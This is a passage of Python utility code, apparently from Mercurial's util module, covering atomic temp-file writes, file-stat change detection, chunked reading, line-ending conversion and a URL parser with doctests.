1928 1928 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1929 1929 os.close(fd)
1930 1930 # Temporary files are created with mode 0600, which is usually not
1931 1931 # what we want. If the original file already exists, just copy
1932 1932 # its mode. Otherwise, manually obey umask.
1933 1933 copymode(name, temp, createmode)
1934 1934 if emptyok:
1935 1935 return temp
1936 1936 try:
1937 1937 try:
1938 1938 ifp = posixfile(name, "rb")
1939 1939 except IOError as inst:
1940 1940 if inst.errno == errno.ENOENT:
1941 1941 return temp
1942 1942 if not getattr(inst, 'filename', None):
1943 1943 inst.filename = name
1944 1944 raise
1945 1945 ofp = posixfile(temp, "wb")
1946 1946 for chunk in filechunkiter(ifp):
1947 1947 ofp.write(chunk)
1948 1948 ifp.close()
1949 1949 ofp.close()
1950 1950 except: # re-raises
1951 1951 try:
1952 1952 os.unlink(temp)
1953 1953 except OSError:
1954 1954 pass
1955 1955 raise
1956 1956 return temp
1957 1957
1958 1958 class filestat(object):
1959 1959 """help to exactly detect change of a file
1960 1960
1961 1961 'stat' attribute is result of 'os.stat()' if specified 'path'
1962 1962 exists. Otherwise, it is None. This can avoid preparative
1963 1963 'exists()' examination on client side of this class.
1964 1964 """
1965 1965 def __init__(self, stat):
1966 1966 self.stat = stat
1967 1967
1968 1968 @classmethod
1969 1969 def frompath(cls, path):
1970 1970 try:
1971 1971 stat = os.stat(path)
1972 1972 except OSError as err:
1973 1973 if err.errno != errno.ENOENT:
1974 1974 raise
1975 1975 stat = None
1976 1976 return cls(stat)
1977 1977
1978 1978 @classmethod
1979 1979 def fromfp(cls, fp):
1980 1980 stat = os.fstat(fp.fileno())
1981 1981 return cls(stat)
1982 1982
1983 1983 __hash__ = object.__hash__
1984 1984
1985 1985 def __eq__(self, old):
1986 1986 try:
1987 1987 # if ambiguity between stat of new and old file is
1988 1988 # avoided, comparison of size, ctime and mtime is enough
1989 1989 # to exactly detect change of a file regardless of platform
1990 1990 return (self.stat.st_size == old.stat.st_size and
1991 1991 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1992 1992 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1993 1993 except AttributeError:
1994 1994 pass
1995 1995 try:
1996 1996 return self.stat is None and old.stat is None
1997 1997 except AttributeError:
1998 1998 return False
1999 1999
2000 2000 def isambig(self, old):
2001 2001 """Examine whether new (= self) stat is ambiguous against old one
2002 2002
2003 2003 "S[N]" below means stat of a file at N-th change:
2004 2004
2005 2005 - S[n-1].ctime < S[n].ctime: can detect change of a file
2006 2006 - S[n-1].ctime == S[n].ctime
2007 2007 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2008 2008 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2009 2009 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2010 2010 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2011 2011
2012 2012 Case (*2) above means that a file was changed twice or more at
2013 2013 same time in sec (= S[n-1].ctime), and comparison of timestamp
2014 2014 is ambiguous.
2015 2015
2016 2016 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2017 2017 timestamp is ambiguous".
2018 2018
2019 2019 But advancing mtime only in case (*2) doesn't work as
2020 2020 expected, because naturally advanced S[n].mtime in case (*1)
2021 2021 might be equal to manually advanced S[n-1 or earlier].mtime.
2022 2022
2023 2023 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2024 2024 treated as ambiguous regardless of mtime, to avoid overlooking
2025 2025 by confliction between such mtime.
2026 2026
2027 2027 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2028 2028 S[n].mtime", even if size of a file isn't changed.
2029 2029 """
2030 2030 try:
2031 2031 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2032 2032 except AttributeError:
2033 2033 return False
2034 2034
2035 2035 def avoidambig(self, path, old):
2036 2036 """Change file stat of specified path to avoid ambiguity
2037 2037
2038 2038 'old' should be previous filestat of 'path'.
2039 2039
2040 2040 This skips avoiding ambiguity, if a process doesn't have
2041 2041 appropriate privileges for 'path'. This returns False in this
2042 2042 case.
2043 2043
2044 2044 Otherwise, this returns True, as "ambiguity is avoided".
2045 2045 """
2046 2046 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2047 2047 try:
2048 2048 os.utime(path, (advanced, advanced))
2049 2049 except OSError as inst:
2050 2050 if inst.errno == errno.EPERM:
2051 2051 # utime() on the file created by another user causes EPERM,
2052 2052 # if a process doesn't have appropriate privileges
2053 2053 return False
2054 2054 raise
2055 2055 return True
2056 2056
2057 2057 def __ne__(self, other):
2058 2058 return not self == other
2059 2059
2060 2060 class atomictempfile(object):
2061 2061 '''writable file object that atomically updates a file
2062 2062
2063 2063 All writes will go to a temporary copy of the original file. Call
2064 2064 close() when you are done writing, and atomictempfile will rename
2065 2065 the temporary copy to the original name, making the changes
2066 2066 visible. If the object is destroyed without being closed, all your
2067 2067 writes are discarded.
2068 2068
2069 2069 checkambig argument of constructor is used with filestat, and is
2070 2070 useful only if target file is guarded by any lock (e.g. repo.lock
2071 2071 or repo.wlock).
2072 2072 '''
2073 2073 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2074 2074 self.__name = name # permanent name
2075 2075 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2076 2076 createmode=createmode)
2077 2077 self._fp = posixfile(self._tempname, mode)
2078 2078 self._checkambig = checkambig
2079 2079
2080 2080 # delegated methods
2081 2081 self.read = self._fp.read
2082 2082 self.write = self._fp.write
2083 2083 self.seek = self._fp.seek
2084 2084 self.tell = self._fp.tell
2085 2085 self.fileno = self._fp.fileno
2086 2086
2087 2087 def close(self):
2088 2088 if not self._fp.closed:
2089 2089 self._fp.close()
2090 2090 filename = localpath(self.__name)
2091 2091 oldstat = self._checkambig and filestat.frompath(filename)
2092 2092 if oldstat and oldstat.stat:
2093 2093 rename(self._tempname, filename)
2094 2094 newstat = filestat.frompath(filename)
2095 2095 if newstat.isambig(oldstat):
2096 2096 # stat of changed file is ambiguous to original one
2097 2097 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2098 2098 os.utime(filename, (advanced, advanced))
2099 2099 else:
2100 2100 rename(self._tempname, filename)
2101 2101
2102 2102 def discard(self):
2103 2103 if not self._fp.closed:
2104 2104 try:
2105 2105 os.unlink(self._tempname)
2106 2106 except OSError:
2107 2107 pass
2108 2108 self._fp.close()
2109 2109
2110 2110 def __del__(self):
2111 2111 if safehasattr(self, '_fp'): # constructor actually did something
2112 2112 self.discard()
2113 2113
2114 2114 def __enter__(self):
2115 2115 return self
2116 2116
2117 2117 def __exit__(self, exctype, excvalue, traceback):
2118 2118 if exctype is not None:
2119 2119 self.discard()
2120 2120 else:
2121 2121 self.close()
2122 2122
2123 2123 def unlinkpath(f, ignoremissing=False):
2124 2124 """unlink and remove the directory if it is empty"""
2125 2125 if ignoremissing:
2126 2126 tryunlink(f)
2127 2127 else:
2128 2128 unlink(f)
2129 2129 # try removing directories that might now be empty
2130 2130 try:
2131 2131 removedirs(os.path.dirname(f))
2132 2132 except OSError:
2133 2133 pass
2134 2134
2135 2135 def tryunlink(f):
2136 2136 """Attempt to remove a file, ignoring ENOENT errors."""
2137 2137 try:
2138 2138 unlink(f)
2139 2139 except OSError as e:
2140 2140 if e.errno != errno.ENOENT:
2141 2141 raise
2142 2142
2143 2143 def makedirs(name, mode=None, notindexed=False):
2144 2144 """recursive directory creation with parent mode inheritance
2145 2145
2146 2146 Newly created directories are marked as "not to be indexed by
2147 2147 the content indexing service", if ``notindexed`` is specified
2148 2148 for "write" mode access.
2149 2149 """
2150 2150 try:
2151 2151 makedir(name, notindexed)
2152 2152 except OSError as err:
2153 2153 if err.errno == errno.EEXIST:
2154 2154 return
2155 2155 if err.errno != errno.ENOENT or not name:
2156 2156 raise
2157 2157 parent = os.path.dirname(os.path.abspath(name))
2158 2158 if parent == name:
2159 2159 raise
2160 2160 makedirs(parent, mode, notindexed)
2161 2161 try:
2162 2162 makedir(name, notindexed)
2163 2163 except OSError as err:
2164 2164 # Catch EEXIST to handle races
2165 2165 if err.errno == errno.EEXIST:
2166 2166 return
2167 2167 raise
2168 2168 if mode is not None:
2169 2169 os.chmod(name, mode)
2170 2170
2171 2171 def readfile(path):
2172 2172 with open(path, 'rb') as fp:
2173 2173 return fp.read()
2174 2174
2175 2175 def writefile(path, text):
2176 2176 with open(path, 'wb') as fp:
2177 2177 fp.write(text)
2178 2178
2179 2179 def appendfile(path, text):
2180 2180 with open(path, 'ab') as fp:
2181 2181 fp.write(text)
2182 2182
2183 2183 class chunkbuffer(object):
2184 2184 """Allow arbitrary sized chunks of data to be efficiently read from an
2185 2185 iterator over chunks of arbitrary size."""
2186 2186
2187 2187 def __init__(self, in_iter):
2188 2188 """in_iter is the iterator that's iterating over the input chunks."""
2189 2189 def splitbig(chunks):
2190 2190 for chunk in chunks:
2191 2191 if len(chunk) > 2**20:
2192 2192 pos = 0
2193 2193 while pos < len(chunk):
2194 2194 end = pos + 2 ** 18
2195 2195 yield chunk[pos:end]
2196 2196 pos = end
2197 2197 else:
2198 2198 yield chunk
2199 2199 self.iter = splitbig(in_iter)
2200 2200 self._queue = collections.deque()
2201 2201 self._chunkoffset = 0
2202 2202
2203 2203 def read(self, l=None):
2204 2204 """Read L bytes of data from the iterator of chunks of data.
2205 2205 Returns less than L bytes if the iterator runs dry.
2206 2206
2207 2207 If size parameter is omitted, read everything"""
2208 2208 if l is None:
2209 2209 return ''.join(self.iter)
2210 2210
2211 2211 left = l
2212 2212 buf = []
2213 2213 queue = self._queue
2214 2214 while left > 0:
2215 2215 # refill the queue
2216 2216 if not queue:
2217 2217 target = 2**18
2218 2218 for chunk in self.iter:
2219 2219 queue.append(chunk)
2220 2220 target -= len(chunk)
2221 2221 if target <= 0:
2222 2222 break
2223 2223 if not queue:
2224 2224 break
2225 2225
2226 2226 # The easy way to do this would be to queue.popleft(), modify the
2227 2227 # chunk (if necessary), then queue.appendleft(). However, for cases
2228 2228 # where we read partial chunk content, this incurs 2 dequeue
2229 2229 # mutations and creates a new str for the remaining chunk in the
2230 2230 # queue. Our code below avoids this overhead.
2231 2231
2232 2232 chunk = queue[0]
2233 2233 chunkl = len(chunk)
2234 2234 offset = self._chunkoffset
2235 2235
2236 2236 # Use full chunk.
2237 2237 if offset == 0 and left >= chunkl:
2238 2238 left -= chunkl
2239 2239 queue.popleft()
2240 2240 buf.append(chunk)
2241 2241 # self._chunkoffset remains at 0.
2242 2242 continue
2243 2243
2244 2244 chunkremaining = chunkl - offset
2245 2245
2246 2246 # Use all of unconsumed part of chunk.
2247 2247 if left >= chunkremaining:
2248 2248 left -= chunkremaining
2249 2249 queue.popleft()
2250 2250 # offset == 0 is enabled by block above, so this won't merely
2251 2251 # copy via ``chunk[0:]``.
2252 2252 buf.append(chunk[offset:])
2253 2253 self._chunkoffset = 0
2254 2254
2255 2255 # Partial chunk needed.
2256 2256 else:
2257 2257 buf.append(chunk[offset:offset + left])
2258 2258 self._chunkoffset += left
2259 2259 left -= chunkremaining
2260 2260
2261 2261 return ''.join(buf)
2262 2262
2263 2263 def filechunkiter(f, size=131072, limit=None):
2264 2264 """Create a generator that produces the data in the file size
2265 2265 (default 131072) bytes at a time, up to optional limit (default is
2266 2266 to read all data). Chunks may be less than size bytes if the
2267 2267 chunk is the last chunk in the file, or the file is a socket or
2268 2268 some other type of file that sometimes reads less data than is
2269 2269 requested."""
2270 2270 assert size >= 0
2271 2271 assert limit is None or limit >= 0
2272 2272 while True:
2273 2273 if limit is None:
2274 2274 nbytes = size
2275 2275 else:
2276 2276 nbytes = min(limit, size)
2277 2277 s = nbytes and f.read(nbytes)
2278 2278 if not s:
2279 2279 break
2280 2280 if limit:
2281 2281 limit -= len(s)
2282 2282 yield s
2283 2283
2284 2284 class cappedreader(object):
2285 2285 """A file object proxy that allows reading up to N bytes.
2286 2286
2287 2287 Given a source file object, instances of this type allow reading up to
2288 2288 N bytes from that source file object. Attempts to read past the allowed
2289 2289 limit are treated as EOF.
2290 2290
2291 2291 It is assumed that I/O is not performed on the original file object
2292 2292 in addition to I/O that is performed by this instance. If there is,
2293 2293 state tracking will get out of sync and unexpected results will ensue.
2294 2294 """
2295 2295 def __init__(self, fh, limit):
2296 2296 """Allow reading up to <limit> bytes from <fh>."""
2297 2297 self._fh = fh
2298 2298 self._left = limit
2299 2299
2300 2300 def read(self, n=-1):
2301 2301 if not self._left:
2302 2302 return b''
2303 2303
2304 2304 if n < 0:
2305 2305 n = self._left
2306 2306
2307 2307 data = self._fh.read(min(n, self._left))
2308 2308 self._left -= len(data)
2309 2309 assert self._left >= 0
2310 2310
2311 2311 return data
2312 2312
2313 2313 def readinto(self, b):
2314 2314 res = self.read(len(b))
2315 2315 if res is None:
2316 2316 return None
2317 2317
2318 2318 b[0:len(res)] = res
2319 2319 return len(res)
2320 2320
2321 2321 def unitcountfn(*unittable):
2322 2322 '''return a function that renders a readable count of some quantity'''
2323 2323
2324 2324 def go(count):
2325 2325 for multiplier, divisor, format in unittable:
2326 2326 if abs(count) >= divisor * multiplier:
2327 2327 return format % (count / float(divisor))
2328 2328 return unittable[-1][2] % count
2329 2329
2330 2330 return go
2331 2331
2332 2332 def processlinerange(fromline, toline):
2333 2333 """Check that linerange <fromline>:<toline> makes sense and return a
2334 2334 0-based range.
2335 2335
2336 2336 >>> processlinerange(10, 20)
2337 2337 (9, 20)
2338 2338 >>> processlinerange(2, 1)
2339 2339 Traceback (most recent call last):
2340 2340 ...
2341 2341 ParseError: line range must be positive
2342 2342 >>> processlinerange(0, 5)
2343 2343 Traceback (most recent call last):
2344 2344 ...
2345 2345 ParseError: fromline must be strictly positive
2346 2346 """
2347 2347 if toline - fromline < 0:
2348 2348 raise error.ParseError(_("line range must be positive"))
2349 2349 if fromline < 1:
2350 2350 raise error.ParseError(_("fromline must be strictly positive"))
2351 2351 return fromline - 1, toline
2352 2352
2353 2353 bytecount = unitcountfn(
2354 2354 (100, 1 << 30, _('%.0f GB')),
2355 2355 (10, 1 << 30, _('%.1f GB')),
2356 2356 (1, 1 << 30, _('%.2f GB')),
2357 2357 (100, 1 << 20, _('%.0f MB')),
2358 2358 (10, 1 << 20, _('%.1f MB')),
2359 2359 (1, 1 << 20, _('%.2f MB')),
2360 2360 (100, 1 << 10, _('%.0f KB')),
2361 2361 (10, 1 << 10, _('%.1f KB')),
2362 2362 (1, 1 << 10, _('%.2f KB')),
2363 2363 (1, 1, _('%.0f bytes')),
2364 2364 )
2365 2365
2366 2366 class transformingwriter(object):
2367 2367 """Writable file wrapper to transform data by function"""
2368 2368
2369 2369 def __init__(self, fp, encode):
2370 2370 self._fp = fp
2371 2371 self._encode = encode
2372 2372
2373 2373 def close(self):
2374 2374 self._fp.close()
2375 2375
2376 2376 def flush(self):
2377 2377 self._fp.flush()
2378 2378
2379 2379 def write(self, data):
2380 2380 return self._fp.write(self._encode(data))
2381 2381
2382 2382 # Matches a single EOL which can either be a CRLF where repeated CR
2383 2383 # are removed or a LF. We do not care about old Macintosh files, so a
2384 2384 # stray CR is an error.
2385 2385 _eolre = remod.compile(br'\r*\n')
2386 2386
2387 2387 def tolf(s):
2388 2388 return _eolre.sub('\n', s)
2389 2389
2390 2390 def tocrlf(s):
2391 2391 return _eolre.sub('\r\n', s)
2392 2392
2393 2393 def _crlfwriter(fp):
2394 2394 return transformingwriter(fp, tocrlf)
2395 2395
2396 2396 if pycompat.oslinesep == '\r\n':
2397 2397 tonativeeol = tocrlf
2398 2398 fromnativeeol = tolf
2399 2399 nativeeolwriter = _crlfwriter
2400 2400 else:
2401 2401 tonativeeol = pycompat.identity
2402 2402 fromnativeeol = pycompat.identity
2403 2403 nativeeolwriter = pycompat.identity
2404 2404
2405 2405 if (pyplatform.python_implementation() == 'CPython' and
2406 2406 sys.version_info < (3, 0)):
2407 2407 # There is an issue in CPython that some IO methods do not handle EINTR
2408 2408 # correctly. The following table shows what CPython version (and functions)
2409 2409 # are affected (buggy: has the EINTR bug, okay: otherwise):
2410 2410 #
2411 2411 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2412 2412 # --------------------------------------------------
2413 2413 # fp.__iter__ | buggy | buggy | okay
2414 2414 # fp.read* | buggy | okay [1] | okay
2415 2415 #
2416 2416 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2417 2417 #
2418 2418 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2419 2419 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2420 2420 #
2421 2421 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2422 2422 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2423 2423 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2424 2424 # fp.__iter__ but not other fp.read* methods.
2425 2425 #
2426 2426 # On modern systems like Linux, the "read" syscall cannot be interrupted
2427 2427 # when reading "fast" files like on-disk files. So the EINTR issue only
2428 2428 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2429 2429 # files approximately as "fast" files and use the fast (unsafe) code path,
2430 2430 # to minimize the performance impact.
2431 2431 if sys.version_info >= (2, 7, 4):
2432 2432 # fp.readline deals with EINTR correctly, use it as a workaround.
2433 2433 def _safeiterfile(fp):
2434 2434 return iter(fp.readline, '')
2435 2435 else:
2436 2436 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2437 2437 # note: this may block longer than necessary because of bufsize.
2438 2438 def _safeiterfile(fp, bufsize=4096):
2439 2439 fd = fp.fileno()
2440 2440 line = ''
2441 2441 while True:
2442 2442 try:
2443 2443 buf = os.read(fd, bufsize)
2444 2444 except OSError as ex:
2445 2445 # os.read only raises EINTR before any data is read
2446 2446 if ex.errno == errno.EINTR:
2447 2447 continue
2448 2448 else:
2449 2449 raise
2450 2450 line += buf
2451 2451 if '\n' in buf:
2452 2452 splitted = line.splitlines(True)
2453 2453 line = ''
2454 2454 for l in splitted:
2455 2455 if l[-1] == '\n':
2456 2456 yield l
2457 2457 else:
2458 2458 line = l
2459 2459 if not buf:
2460 2460 break
2461 2461 if line:
2462 2462 yield line
2463 2463
2464 2464 def iterfile(fp):
2465 2465 fastpath = True
2466 2466 if type(fp) is file:
2467 2467 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2468 2468 if fastpath:
2469 2469 return fp
2470 2470 else:
2471 2471 return _safeiterfile(fp)
2472 2472 else:
2473 2473 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2474 2474 def iterfile(fp):
2475 2475 return fp
2476 2476
2477 2477 def iterlines(iterator):
2478 2478 for chunk in iterator:
2479 2479 for line in chunk.splitlines():
2480 2480 yield line
2481 2481
2482 2482 def expandpath(path):
2483 2483 return os.path.expanduser(os.path.expandvars(path))
2484 2484
2485 2485 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2486 2486 """Return the result of interpolating items in the mapping into string s.
2487 2487
2488 2488 prefix is a single character string, or a two character string with
2489 2489 a backslash as the first character if the prefix needs to be escaped in
2490 2490 a regular expression.
2491 2491
2492 2492 fn is an optional function that will be applied to the replacement text
2493 2493 just before replacement.
2494 2494
2495 2495 escape_prefix is an optional flag that allows using doubled prefix for
2496 2496 its escaping.
2497 2497 """
2498 2498 fn = fn or (lambda s: s)
2499 2499 patterns = '|'.join(mapping.keys())
2500 2500 if escape_prefix:
2501 2501 patterns += '|' + prefix
2502 2502 if len(prefix) > 1:
2503 2503 prefix_char = prefix[1:]
2504 2504 else:
2505 2505 prefix_char = prefix
2506 2506 mapping[prefix_char] = prefix_char
2507 2507 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2508 2508 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2509 2509
2510 2510 def getport(port):
2511 2511 """Return the port for a given network service.
2512 2512
2513 2513 If port is an integer, it's returned as is. If it's a string, it's
2514 2514 looked up using socket.getservbyname(). If there's no matching
2515 2515 service, error.Abort is raised.
2516 2516 """
2517 2517 try:
2518 2518 return int(port)
2519 2519 except ValueError:
2520 2520 pass
2521 2521
2522 2522 try:
2523 2523 return socket.getservbyname(pycompat.sysstr(port))
2524 2524 except socket.error:
2525 2525 raise error.Abort(_("no port number associated with service '%s'")
2526 2526 % port)
2527 2527
2528 2528 class url(object):
2529 2529 r"""Reliable URL parser.
2530 2530
2531 2531 This parses URLs and provides attributes for the following
2532 2532 components:
2533 2533
2534 2534 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2535 2535
2536 2536 Missing components are set to None. The only exception is
2537 2537 fragment, which is set to '' if present but empty.
2538 2538
2539 2539 If parsefragment is False, fragment is included in query. If
2540 2540 parsequery is False, query is included in path. If both are
2541 2541 False, both fragment and query are included in path.
2542 2542
2543 2543 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2544 2544
2545 2545 Note that for backward compatibility reasons, bundle URLs do not
2546 2546 take host names. That means 'bundle://../' has a path of '../'.
2547 2547
2548 2548 Examples:
2549 2549
2550 2550 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2551 2551 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2552 2552 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2553 2553 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2554 2554 >>> url(b'file:///home/joe/repo')
2555 2555 <url scheme: 'file', path: '/home/joe/repo'>
2556 2556 >>> url(b'file:///c:/temp/foo/')
2557 2557 <url scheme: 'file', path: 'c:/temp/foo/'>
2558 2558 >>> url(b'bundle:foo')
2559 2559 <url scheme: 'bundle', path: 'foo'>
2560 2560 >>> url(b'bundle://../foo')
2561 2561 <url scheme: 'bundle', path: '../foo'>
2562 2562 >>> url(br'c:\foo\bar')
2563 2563 <url path: 'c:\\foo\\bar'>
2564 2564 >>> url(br'\\blah\blah\blah')
2565 2565 <url path: '\\\\blah\\blah\\blah'>
2566 2566 >>> url(br'\\blah\blah\blah#baz')
2567 2567 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2568 2568 >>> url(br'file:///C:\users\me')
2569 2569 <url scheme: 'file', path: 'C:\\users\\me'>
2570 2570
2571 2571 Authentication credentials:
2572 2572
2573 2573 >>> url(b'ssh://joe:xyz@x/repo')
2574 2574 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2575 2575 >>> url(b'ssh://joe@x/repo')
2576 2576 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2577 2577
2578 2578 Query strings and fragments:
2579 2579
2580 2580 >>> url(b'http://host/a?b#c')
2581 2581 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2582 2582 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2583 2583 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2584 2584
2585 2585 Empty path:
2586 2586
2587 2587 >>> url(b'')
2588 2588 <url path: ''>
2589 2589 >>> url(b'#a')
2590 2590 <url path: '', fragment: 'a'>
2591 2591 >>> url(b'http://host/')
2592 2592 <url scheme: 'http', host: 'host', path: ''>
2593 2593 >>> url(b'http://host/#a')
2594 2594 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2595 2595
2596 2596 Only scheme:
2597 2597
2598 2598 >>> url(b'http:')
2599 2599 <url scheme: 'http'>
2600 2600 """
2601 2601
2602 2602 _safechars = "!~*'()+"
2603 2603 _safepchars = "/!~*'()+:\\"
2604 2604 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2605 2605
2606 2606 def __init__(self, path, parsequery=True, parsefragment=True):
2607 2607 # We slowly chomp away at path until we have only the path left
2608 2608 self.scheme = self.user = self.passwd = self.host = None
2609 2609 self.port = self.path = self.query = self.fragment = None
2610 2610 self._localpath = True
2611 2611 self._hostport = ''
2612 2612 self._origpath = path
2613 2613
2614 2614 if parsefragment and '#' in path:
2615 2615 path, self.fragment = path.split('#', 1)
2616 2616
2617 2617 # special case for Windows drive letters and UNC paths
2618 2618 if hasdriveletter(path) or path.startswith('\\\\'):
2619 2619 self.path = path
2620 2620 return
2621 2621
2622 2622 # For compatibility reasons, we can't handle bundle paths as
2623 2623 # normal URLS
2624 2624 if path.startswith('bundle:'):
2625 2625 self.scheme = 'bundle'
2626 2626 path = path[7:]
2627 2627 if path.startswith('//'):
2628 2628 path = path[2:]
2629 2629 self.path = path
2630 2630 return
2631 2631
2632 2632 if self._matchscheme(path):
2633 2633 parts = path.split(':', 1)
2634 2634 if parts[0]:
2635 2635 self.scheme, path = parts
2636 2636 self._localpath = False
2637 2637
2638 2638 if not path:
2639 2639 path = None
2640 2640 if self._localpath:
2641 2641 self.path = ''
2642 2642 return
2643 2643 else:
2644 2644 if self._localpath:
2645 2645 self.path = path
2646 2646 return
2647 2647
2648 2648 if parsequery and '?' in path:
2649 2649 path, self.query = path.split('?', 1)
2650 2650 if not path:
2651 2651 path = None
2652 2652 if not self.query:
2653 2653 self.query = None
2654 2654
2655 2655 # // is required to specify a host/authority
2656 2656 if path and path.startswith('//'):
2657 2657 parts = path[2:].split('/', 1)
2658 2658 if len(parts) > 1:
2659 2659 self.host, path = parts
2660 2660 else:
2661 2661 self.host = parts[0]
2662 2662 path = None
2663 2663 if not self.host:
2664 2664 self.host = None
2665 2665 # path of file:///d is /d
2666 2666 # path of file:///d:/ is d:/, not /d:/
2667 2667 if path and not hasdriveletter(path):
2668 2668 path = '/' + path
2669 2669
2670 2670 if self.host and '@' in self.host:
2671 2671 self.user, self.host = self.host.rsplit('@', 1)
2672 2672 if ':' in self.user:
2673 2673 self.user, self.passwd = self.user.split(':', 1)
2674 2674 if not self.host:
2675 2675 self.host = None
2676 2676
2677 2677 # Don't split on colons in IPv6 addresses without ports
2678 2678 if (self.host and ':' in self.host and
2679 2679 not (self.host.startswith('[') and self.host.endswith(']'))):
2680 2680 self._hostport = self.host
2681 2681 self.host, self.port = self.host.rsplit(':', 1)
2682 2682 if not self.host:
2683 2683 self.host = None
2684 2684
2685 2685 if (self.host and self.scheme == 'file' and
2686 2686 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2687 2687 raise error.Abort(_('file:// URLs can only refer to localhost'))
2688 2688
2689 2689 self.path = path
2690 2690
2691 2691 # leave the query string escaped
2692 2692 for a in ('user', 'passwd', 'host', 'port',
2693 2693 'path', 'fragment'):
2694 2694 v = getattr(self, a)
2695 2695 if v is not None:
2696 2696 setattr(self, a, urlreq.unquote(v))
2697 2697
2698 2698 @encoding.strmethod
2699 2699 def __repr__(self):
2700 2700 attrs = []
2701 2701 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2702 2702 'query', 'fragment'):
2703 2703 v = getattr(self, a)
2704 2704 if v is not None:
2705 2705 attrs.append('%s: %r' % (a, v))
2706 2706 return '<url %s>' % ', '.join(attrs)
2707 2707
2708 2708 def __bytes__(self):
2709 2709 r"""Join the URL's components back into a URL string.
2710 2710
2711 2711 Examples:
2712 2712
2713 2713 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2714 2714 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2715 2715 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2716 2716 'http://user:pw@host:80/?foo=bar&baz=42'
2717 2717 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2718 2718 'http://user:pw@host:80/?foo=bar%3dbaz'
2719 2719 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2720 2720 'ssh://user:pw@[::1]:2200//home/joe#'
2721 2721 >>> bytes(url(b'http://localhost:80//'))
2722 2722 'http://localhost:80//'
2723 2723 >>> bytes(url(b'http://localhost:80/'))
2724 2724 'http://localhost:80/'
2725 2725 >>> bytes(url(b'http://localhost:80'))
2726 2726 'http://localhost:80/'
2727 2727 >>> bytes(url(b'bundle:foo'))
2728 2728 'bundle:foo'
2729 2729 >>> bytes(url(b'bundle://../foo'))
2730 2730 'bundle:../foo'
2731 2731 >>> bytes(url(b'path'))
2732 2732 'path'
2733 2733 >>> bytes(url(b'file:///tmp/foo/bar'))
2734 2734 'file:///tmp/foo/bar'
2735 2735 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2736 2736 'file:///c:/tmp/foo/bar'
2737 2737 >>> print(url(br'bundle:foo\bar'))
2738 2738 bundle:foo\bar
2739 2739 >>> print(url(br'file:///D:\data\hg'))
2740 2740 file:///D:\data\hg
2741 2741 """
2742 2742 if self._localpath:
2743 2743 s = self.path
2744 2744 if self.scheme == 'bundle':
2745 2745 s = 'bundle:' + s
2746 2746 if self.fragment:
2747 2747 s += '#' + self.fragment
2748 2748 return s
2749 2749
2750 2750 s = self.scheme + ':'
2751 2751 if self.user or self.passwd or self.host:
2752 2752 s += '//'
2753 2753 elif self.scheme and (not self.path or self.path.startswith('/')
2754 2754 or hasdriveletter(self.path)):
2755 2755 s += '//'
2756 2756 if hasdriveletter(self.path):
2757 2757 s += '/'
2758 2758 if self.user:
2759 2759 s += urlreq.quote(self.user, safe=self._safechars)
2760 2760 if self.passwd:
2761 2761 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2762 2762 if self.user or self.passwd:
2763 2763 s += '@'
2764 2764 if self.host:
2765 2765 if not (self.host.startswith('[') and self.host.endswith(']')):
2766 2766 s += urlreq.quote(self.host)
2767 2767 else:
2768 2768 s += self.host
2769 2769 if self.port:
2770 2770 s += ':' + urlreq.quote(self.port)
2771 2771 if self.host:
2772 2772 s += '/'
2773 2773 if self.path:
2774 2774 # TODO: similar to the query string, we should not unescape the
